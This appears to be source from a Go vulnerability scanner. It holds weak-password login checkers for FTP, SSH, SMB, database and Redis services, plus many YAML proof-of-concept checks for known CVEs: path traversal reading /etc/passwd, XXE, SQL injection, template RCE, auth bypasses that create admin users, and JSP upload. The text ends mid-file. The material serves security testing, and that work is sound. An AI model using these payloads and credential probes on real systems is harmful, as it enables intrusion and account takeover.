-------------------------------------------------------------------------------- /pkg/jobs/cron.go: -------------------------------------------------------------------------------- 1 | package jobs 2 | 3 | 4 | import ( 5 | "github.com/robfig/cron/v3" 6 | "sync" 7 | ) 8 | 9 | 10 | var ( 11 | mainCron *cron.Cron 12 | workPool chan bool 13 | lock sync.Mutex 14 | ) 15 | 16 | 17 | func init() { 18 | workPool = make(chan bool, 10) 19 | mainCron = cron.New() 20 | mainCron.Start() 21 | } 22 | 23 | func AddJob(spec string, job *Job) bool { 24 | lock.Lock()//防止在并发的时候添加多个相同job 25 | defer lock.Unlock() 26 | 27 | if GetEntryById(job.id) != nil { //如果存在这个job 那么就添加失败 不需要重复添加 28 | return false 29 | } 30 | _,err := mainCron.AddJob(spec, job) 31 | if err != nil{ 32 | return false 33 | }else{ 34 | return true 35 | } 36 | 37 | } 38 | 39 | func RemoveJob(id int) { 40 | entry := GetEntryById(id) 41 | if entry == nil { 42 | return 43 | } 44 | ID := entry.ID 45 | mainCron.Remove(ID) 46 | 47 | } 48 | 49 | func GetEntryById(id int) *cron.Entry { 50 | entries := mainCron.Entries() 51 | for _, en := range entries { 52 | if v, ok := en.Job.(*Job); ok { 53 | if v.id == id { 54 | return &en 55 | } 56 | } 57 | } 58 | return nil 59 | } 60 | -------------------------------------------------------------------------------- /pkg/plugins/ftp.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "github.com/jlaffaye/ftp" 5 | "time" 6 | ) 7 | 8 | func ScanFtp(ip string, port string, username string, password string) (err error, result bool) { 9 | conn, err := ftp.DialTimeout(ip+":"+port, time.Second*3) 10 | if err == nil { 11 | err = conn.Login(username, password) 12 | if err == nil { 13 | result = true 14 | conn.Logout() 15 | } 16 | } 17 | return err, result 18 | } 19 | -------------------------------------------------------------------------------- /pkg/plugins/mongodb.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "gopkg.in/mgo.v2" 5 | "time" 6 | ) 7 | 8 | //mongodb未授权和弱口令漏洞 9 | func ScanMongodb(ip string, port string, username string, password string) (err error, result bool) { 10 | session, err := mgo.DialWithTimeout("mongodb://"+username+":"+password+"@"+ip+":"+port+"/"+"admin", time.Second*3) 11 | if err == nil && session.Ping() == nil { 12 | defer session.Close() 13 | if err == nil && session.Run("serverStatus", nil) == nil { 14 | result = true 15 | } 16 | } 17 | return err, result 18 | } 19 | 20 | func MongoUnauth(ip string, port string) (err error, result bool) { 21 | session, err := mgo.Dial(ip + ":" + port) 22 | if err == nil && session.Run("serverStatus", nil) == nil { 23 | result = true 24 | } 25 | return err, result 26 | } 27 | -------------------------------------------------------------------------------- /pkg/plugins/mssql.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "database/sql" 5 | _ "github.com/denisenkom/go-mssqldb" 6 | ) 7 | 8 | func ScanMssql(ip string, port string, username string, password string) (err error, result bool) { 9 | db, err := sql.Open("mssql", "server="+ip+";port="+port+";user id="+username+";password="+password+";database=master") 10 | if err == nil { 11 | defer db.Close() 12 | err = db.Ping() 13 | if err == nil { 14 | result = true 15 | } 16 | } 17 | return err, result 18 | } 19 | -------------------------------------------------------------------------------- /pkg/plugins/mysql.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | //_ "github.com/go-sql-driver/mysql" 7 | //_ "github.com/netxfly/mysql" 8 | "time" 9 | ) 10 | 11 | func ScanMysql(ip string, port string, username string, password string) (err error, result bool) { 12 | result = false 13 | connStr := fmt.Sprintf("%s:%s@tcp(%s)/?timeout=%ds", username, password, ip+":"+port, time.Second*3) 14 | db, err := sql.Open("mysql", connStr) 15 | if err == nil { 16 | defer db.Close() 17 | err = db.Ping() 18 | if err == nil { 19 | defer db.Close() 20 | result = true 21 | } 22 | } 23 | return err, result 24 | } 25 | -------------------------------------------------------------------------------- /pkg/plugins/plugins.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | type ScanFunc func(ip string, port string, username string, password string) (err error, result bool) 4 | 5 | var ( 6 | ScanFuncMap map[string]ScanFunc 7 | ) 8 | 9 | func init() { 10 | ScanFuncMap = make(map[string]ScanFunc) 11 | ScanFuncMap["FTP"] = ScanFtp 12 | ScanFuncMap["SSH"] = ScanSsh 13 | ScanFuncMap["SMB"] = ScanSmb // 139,445 14 | ScanFuncMap["MSSQL"] = ScanMssql 15 | ScanFuncMap["MYSQL"] = ScanMysql 16 | ScanFuncMap["POSTGRESQL"] = ScanPostgres // postgres 5432 17 | ScanFuncMap["REDIS"] = ScanRedis 18 | //ScanFuncMap["ELASTICSEARCH"] = ScanElastic 19 | ScanFuncMap["MONGOD"] = ScanMongodb // 27017 20 | //ScanFuncMap["JAVADEBUG"] = JavaDebug // 9091 21 | //ScanFuncMap["ORACLE"] = ScanOracle // 1521 22 | 23 | //161: "SNMP", snmp的主要作用是对网络设备和设备中的应用程序进行管理,因此,获得了snmp口令后,主要的作用就是查询系统信息 24 | // 25 | //4043 rsync 26 | //rfp 27 | //ZooKeeper 2181 28 | //zookeeper是分布式协同管理工具,常用来管理系统配置信息,攻击者能够执行所有只允许由管理员运行的命令。 29 | //Atlassian Crowd 8095 30 | //Elasticsearch 8080 31 | //Jupyter Notebook 8888 32 | } 33 | -------------------------------------------------------------------------------- /pkg/plugins/postgres.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | _ "github.com/lib/pq" 5 | 6 | "database/sql" 7 | "fmt" 8 | ) 9 | 10 | func ScanPostgres(ip string, port string, username string, password string) (err error, result bool) { 11 | //fmt.Println( fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", username, password, ip, port, "postgres", "disable")) 12 | db, err := sql.Open("postgres", fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", username, password, ip, port, "postgres", "disable")) 13 | if err == nil { 14 | defer db.Close() 15 | err = db.Ping() 16 | if err == nil { 17 | result = true 18 | } 19 | } 20 | return err, result 21 | } 22 | -------------------------------------------------------------------------------- /pkg/plugins/redis.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "github.com/go-redis/redis" 5 | "time" 6 | ) 7 | 8 | func ScanRedis(ip string, port string, username string, password string) (err error, result bool) { 9 | client := redis.NewClient(&redis.Options{Addr: ip + ":" + port, Password: password, DB: 0, DialTimeout: time.Second * 3}) 10 | defer client.Close() 11 | _, err = client.Ping().Result() 12 | if err == nil { 13 | result = true 14 | } 15 | return err, result 16 | } 17 | -------------------------------------------------------------------------------- /pkg/plugins/smb.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "github.com/stacktitan/smb/smb" 5 | ) 6 | 7 | 8 | 9 | func ScanSmb(ip string, port string, username string, password string) (err error, result bool) { 10 | result = false 11 | //fmt.Println("run smcd") 12 | //port,_ = strconv.Atoi(port) 13 | 14 | options := smb.Options{ 15 | Host: ip, 16 | Port: 445, 17 | User: username, 18 | Password: password, 19 | Domain: "", 20 | Workstation: "", 21 | } 22 | 23 | session, err := smb.NewSession(options, false) 24 | if err == nil { 25 | session.Close() 26 | if session.IsAuthenticated { 27 | result = true 28 | } 29 | } 30 | return err, result 31 | } 32 | 33 | // 34 | //debug := false 35 | //session, err := smb.NewSession(options, debug) 36 | //if err != nil { 37 | //log.Fatalln("[!]", err) 38 | //} 39 | //defer session.Close() 40 | // 41 | //if session.IsSigningRequired { 42 | //log.Println("[-] Signing is required") 43 | //} else { 44 | //log.Println("[+] Signing is NOT required") 45 | //} 46 | // 47 | //if session.IsAuthenticated { 48 | //log.Println("[+] Login successful") 49 | //} else { 50 | //log.Println("[-] Login failed") 51 | //} 52 | // 53 | //if err != nil { 54 | //log.Fatalln("[!]", err) 55 | //} -------------------------------------------------------------------------------- /pkg/plugins/ssh.go: -------------------------------------------------------------------------------- 1 | package plugins 2 | 3 | import ( 4 | "golang.org/x/crypto/ssh" 5 | "net" 6 | "time" 7 | ) 8 | 9 | func ScanSsh(ip string, port string, username string, password string) (err error, result bool) { 10 | //fmt.Println("ScanSsh:",username,password) 11 | config := &ssh.ClientConfig{ 12 | User: username, 13 | Auth: []ssh.AuthMethod{ 14 | ssh.Password(password), 15 | }, 16 | HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { 17 | return nil 18 | }, 19 | Timeout: time.Second * 3, 20 | } 21 | 22 | client, err := ssh.Dial("tcp", ip+":"+port, config) 23 | if err == nil { 24 | defer client.Close() 25 | session, err := client.NewSession() 26 | defer session.Close() 27 | errRet := session.Run("echo xsec") 28 | if err == nil && errRet == nil { 29 | result = true 30 | } 31 | } 32 | return err, result 33 | } 34 | -------------------------------------------------------------------------------- /pkg/pocs/activemq-cve-2016-3088.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-activemq-cve-2016-3088 2 | set: 3 | filename: randomLowercase(6) 4 | fileContent: randomLowercase(6) 5 | rules: 6 | - method: PUT 7 | path: /fileserver/{{filename}}.txt 8 | body: | 9 | {{fileContent}} 10 | expression: | 11 | response.status == 204 12 | - method: GET 13 | path: /admin/test/index.jsp 14 | search: | 15 | activemq.home=(?P.*?), 16 | follow_redirects: false 17 | expression: | 18 | response.status == 200 19 | - method: MOVE 20 | path: /fileserver/{{filename}}.txt 21 | headers: 22 | Destination: "file://{{home}}/webapps/api/{{filename}}.jsp" 23 | follow_redirects: false 24 | expression: | 25 | response.status == 204 26 | - method: GET 27 | path: /api/{{filename}}.jsp 28 | follow_redirects: false 29 | expression: | 30 | response.status == 200 && response.body.bcontains(bytes(fileContent)) 31 | detail: 32 | author: j4ckzh0u(https://github.com/j4ckzh0u) 33 | links: 34 | - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088 35 | -------------------------------------------------------------------------------- /pkg/pocs/activemq-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-activemq-default-password 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 401 && response.body.bcontains(b"Unauthorized") 7 | - method: GET 8 | path: /admin/ 9 | headers: 10 | Authorization: Basic YWRtaW46YWRtaW4= 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") 13 | detail: 14 | author: pa55w0rd(www.pa55w0rd.online/) 15 | links: 16 | - https://blog.csdn.net/ge00111/article/details/72765210 17 | -------------------------------------------------------------------------------- /pkg/pocs/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | links: 10 | - http://airflow.apache.org/ 11 | -------------------------------------------------------------------------------- /pkg/pocs/alibaba-nacos-v1-auth-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-nacos-v1-auth-bypass 2 | set: 3 | r1: randomLowercase(16) 4 | r2: randomLowercase(16) 5 | rules: 6 | - method: POST 7 | path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}" 8 | headers: 9 | User-Agent: Nacos-Server 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes("create user ok!")) 12 | - method: GET 13 | path: "/nacos/v1/auth/users?pageNo=1&pageSize=999" 14 | headers: 15 | User-Agent: Nacos-Server 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(r1)) 18 | - method: DELETE 19 | path: "/nacos/v1/auth/users?username={{r1}}" 20 | headers: 21 | User-Agent: Nacos-Server 22 | expression: | 23 | response.status == 200 && response.body.bcontains(bytes("delete user ok!")) 24 | detail: 25 | author: kmahyyg(https://github.com/kmahyyg) 26 | links: 27 | - https://github.com/alibaba/nacos/issues/4593 28 | -------------------------------------------------------------------------------- /pkg/pocs/apache-flink-upload-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-flink-upload-rce 2 | set: 3 | r1: randomLowercase(8) 4 | r2: randomLowercase(4) 5 | rules: 6 | - method: GET 7 | path: /jars 8 | follow_redirects: true 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && 11 | response.body.bcontains(b"address") && response.body.bcontains(b"files") 12 | - method: POST 13 | path: /jars/upload 14 | headers: 15 | Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 16 | body: |- 17 | --8ce4b16b22b58894aa86c421e8759df3 18 | Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar" 19 | Content-Type:application/octet-stream 20 | 21 | {{r1}} 22 | --8ce4b16b22b58894aa86c421e8759df3-- 23 | 24 | follow_redirects: true 25 | expression: > 26 | response.status == 200 && response.content_type.contains("json") && 27 | response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) 28 | search: >- 29 | (?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar)) 30 | - method: DELETE 31 | path: '/jars/{{filen}}' 32 | follow_redirects: true 33 | expression: | 34 | response.status == 200 35 | detail: 36 | author: timwhite 37 | links: 38 | - https://github.com/LandGrey/flink-unauth-rce 39 | -------------------------------------------------------------------------------- /pkg/pocs/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | rules: 3 | - method: GET 4 | path: /kylin/api/admin/config 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 7 | detail: 8 | author: JingLing(github.com/shmilylty) 9 | links: 10 | - https://s.tencent.com/research/bsafe/1156.html 11 | -------------------------------------------------------------------------------- /pkg/pocs/apache-ofbiz-cve-2018-8033-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe 2 | rules: 3 | - method: POST 4 | path: /webtools/control/xmlrpc 5 | headers: 6 | Content-Type: application/xml 7 | body: >- 8 | ]>&disclose; 9 | follow_redirects: false 10 | expression: > 11 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") 12 | detail: 13 | author: su(https://suzzz112113.github.io/#blog) 14 | links: 15 | - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py -------------------------------------------------------------------------------- /pkg/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /webtools/control/xmlrpc 7 | headers: 8 | Content-Type: application/xml 9 | body: >- 10 | {{rand}}dwisiswant0 12 | follow_redirects: false 13 | expression: > 14 | response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand))) 15 | detail: 16 | author: su(https://suzzz112113.github.io/#blog) 17 | links: 18 | - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E 19 | - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb 20 | -------------------------------------------------------------------------------- /pkg/pocs/aspcms-backend-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-aspcms-backend-leak 2 | rules: 3 | - method: GET 4 | path: /plug/oem/AspCms_OEMFun.asp 5 | expression: | 6 | response.status == 200 && "")) && response.body.bcontains(b"citrix") 13 | detail: 14 | author: JingLing(https://hackfun.org/) 15 | links: 16 | - https://support.citrix.com/article/CTX276688 17 | - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ 18 | - https://dmaasland.github.io/posts/citrix.html 19 | -------------------------------------------------------------------------------- /pkg/pocs/citrix-cve-2020-8193-unauthorized.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-cve-2020-8193-unauthorized 2 | set: 3 | user: randomLowercase(8) 4 | pass: randomLowercase(8) 5 | rules: 6 | - method: POST 7 | path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" 8 | headers: 9 | Content-Type: application/xml 10 | X-NITRO-USER: '{{user}}' 11 | X-NITRO-PASS: '{{pass}}' 12 | body: 13 | follow_redirects: false 14 | expression: > 15 | response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"])) 16 | detail: 17 | author: bufsnake(https://github.com/bufsnake) 18 | links: 19 | - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py 20 | - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html 21 | -------------------------------------------------------------------------------- /pkg/pocs/citrix-xenmobile-cve-2020-8209.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209 2 | rules: 3 | - method: GET 4 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "^root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: B1anda0(https://github.com/B1anda0) 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 12 | -------------------------------------------------------------------------------- /pkg/pocs/coldfusion-cve-2010-2861-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=") 9 | detail: 10 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions 11 | author: sharecast 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -------------------------------------------------------------------------------- /pkg/pocs/confluence-cve-2015-8399.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2015-8399 2 | rules: 3 | - method: GET 4 | path: /spaces/viewdefaultdecorator.action?decoratorName 5 | follow_redirects: false 6 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator") 7 | detail: 8 | author: whynot(https://github.com/notwhy) 9 | links: 10 | - https://www.anquanke.com/vul/id/1150798 -------------------------------------------------------------------------------- /pkg/pocs/confluence-cve-2019-3396-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-confluence-cve-2019-3396-lfi 2 | rules: 3 | - method: POST 4 | path: /rest/tinymce/1/macro/preview 5 | headers: 6 | Content-Type: "application/json" 7 | Host: localhost 8 | Referer: http://localhost 9 | body: >- 10 | {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}} 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(b"contextConfigLocation") 14 | detail: 15 | author: sharecast 16 | links: 17 | - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396 -------------------------------------------------------------------------------- /pkg/pocs/consul-rexec-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-rexec-rce 2 | rules: 3 | - method: GET 4 | path: /v1/agent/self 5 | expression: | 6 | response.body.bcontains(b"\"DisableRemoteExec\": false") 7 | detail: 8 | author: imlonghao(https://imlonghao.com/) 9 | links: 10 | - https://www.exploit-db.com/exploits/46073 11 | -------------------------------------------------------------------------------- /pkg/pocs/consul-service-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-consul-service-rce 2 | rules: 3 | - method: GET 4 | path: /v1/agent/self 5 | expression: | 6 | response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true") 7 | detail: 8 | author: imlonghao(https://imlonghao.com/) 9 | links: 10 | - https://www.exploit-db.com/exploits/46074 11 | -------------------------------------------------------------------------------- /pkg/pocs/coremail-cnvd-2019-16798.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-coremail-cnvd-2019-16798 2 | rules: 3 | - method: GET 4 | path: >- 5 | /mailsms/s?func=ADMIN:appState&dumpConfig=/ 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(bytes("")) 9 | detail: 10 | author: cc_ci(https://github.com/cc8ci) 11 | links: 12 | - https://www.secpulse.com/archives/107611.html -------------------------------------------------------------------------------- /pkg/pocs/couchcms-cve-2018-7662.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchcms-cve-2018-7662 2 | rules: 3 | - method: GET 4 | path: /includes/mysql2i/mysql2i.func.php 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in") 8 | - method: GET 9 | path: /addons/phpmailer/phpmailer.php 10 | follow_redirects: false 11 | expression: > 12 | response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in") 13 | detail: 14 | author: we1x4n(https://we1x4n.github.io/) 15 | links: 16 | - https://github.com/CouchCMS/CouchCMS/issues/46 17 | -------------------------------------------------------------------------------- /pkg/pocs/couchdb-cve-2017-12635.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-cve-2017-12635 2 | set: 3 | r1: randomLowercase(32) 4 | rules: 5 | - method: PUT 6 | path: '/_users/org.couchdb.user:{{r1}}' 7 | headers: 8 | Content-Type: application/json 9 | Content-Length: '192' 10 | body: |- 11 | { 12 | "type": "user", 13 | "name": "{{r1}}", 14 | "roles": ["_admin"], 15 | "roles": [], 16 | "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9" 17 | } 18 | follow_redirects: false 19 | expression: | 20 | response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1)) 21 | detail: 22 | author: j4ckzh0u(https://github.com/j4ckzh0u) 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 25 | -------------------------------------------------------------------------------- /pkg/pocs/couchdb-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-couchdb-unauth 2 | rules: 3 | - method: GET 4 | path: /_config 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://www.seebug.org/vuldb/ssvid-91597 -------------------------------------------------------------------------------- /pkg/pocs/craftcms-seomatic-cve-2020-9757-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | groups: 6 | poc1: 7 | - method: GET 8 | path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2))) 11 | poc2: 12 | - method: GET 13 | path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}} 14 | expression: | 15 | response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2))) 16 | detail: 17 | author: x1n9Qi8 18 | links: 19 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181 20 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757 21 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-carbuyaction-fileinclude.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-carbuyaction-fileinclude 2 | rules: 3 | - method: GET 4 | path: /plus/carbuyaction.php?dopost=return&code=../../ 5 | headers: 6 | Cookie: code=alipay 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /plus/carbuyaction.php?dopost=return&code=../../ 12 | headers: 13 | Cookie: code=cod 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes("Cod::respond()")) 17 | 18 | detail: 19 | author: harris2015(https://github.com/harris2015) 20 | Affected Version: "DedeCmsV5.x" 21 | links: 22 | - https://www.cnblogs.com/milantgh/p/3615986.html 23 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-cve-2018-6910.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-6910 2 | rules: 3 | - method: GET 4 | path: /include/downmix.inc.php 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()")) 7 | detail: 8 | author: PickledFish(https://github.com/PickledFish) 9 | links: 10 | - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md -------------------------------------------------------------------------------- /pkg/pocs/dedecms-cve-2018-7700-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-cve-2018-7700-rce 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field} 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: harris2015(https://github.com/harris2015) 13 | Affected Version: "V5.7SP2正式版(2018-01-09)" 14 | links: 15 | - https://xz.aliyun.com/t/2224 16 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-guestbook-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-guestbook-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /plus/guestbook.php 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | search: action=admin&id=(?P\d{1,20}) 11 | - method: GET 12 | path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email=' 13 | follow_redirects: true 14 | expression: | 15 | response.status == 200 16 | - method: GET 17 | path: /plus/guestbook.php 18 | follow_redirects: true 19 | expression: | 20 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 21 | 22 | detail: 23 | author: harris2015(https://github.com/harris2015) 24 | Affected Version: "5.7" 25 | links: 26 | - https://blog.csdn.net/god_7z1/article/details/8180454 27 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-membergroup-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-membergroup-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'` 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: harris2015(https://github.com/harris2015) 13 | Affected Version: "5.6,5.7" 14 | links: 15 | - http://www.dedeyuan.com/xueyuan/wenti/1244.html 16 | -------------------------------------------------------------------------------- /pkg/pocs/dedecms-url-redirection.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-dedecms-url-redirection 2 | rules: 3 | - method: GET 4 | path: >- 5 | /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t 6 | follow_redirects: false 7 | expression: > 8 | response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com" 9 | detail: 10 | author: cc_ci(https://github.com/cc8ci) 11 | Affected Version: "V5.7 sp1" 12 | links: 13 | - https://blog.csdn.net/ystyaoshengting/article/details/82734888 -------------------------------------------------------------------------------- /pkg/pocs/discuz-ml3x-cnvd-2019-22239.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-ml3x-cnvd-2019-22239 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /forum.php 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 10 | search: cookiepre = '(?P[\w_]+)' 11 | - method: GET 12 | path: /forum.php 13 | headers: 14 | Cookie: "{{token}}language=sc'.print(md5({{r1}})).'" 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(md5(string(r1)))) 18 | detail: 19 | author: X.Yang 20 | Discuz_version: Discuz!ML 3.x 21 | links: 22 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-22239 23 | -------------------------------------------------------------------------------- /pkg/pocs/discuz-v72-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-discuz-v72-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && 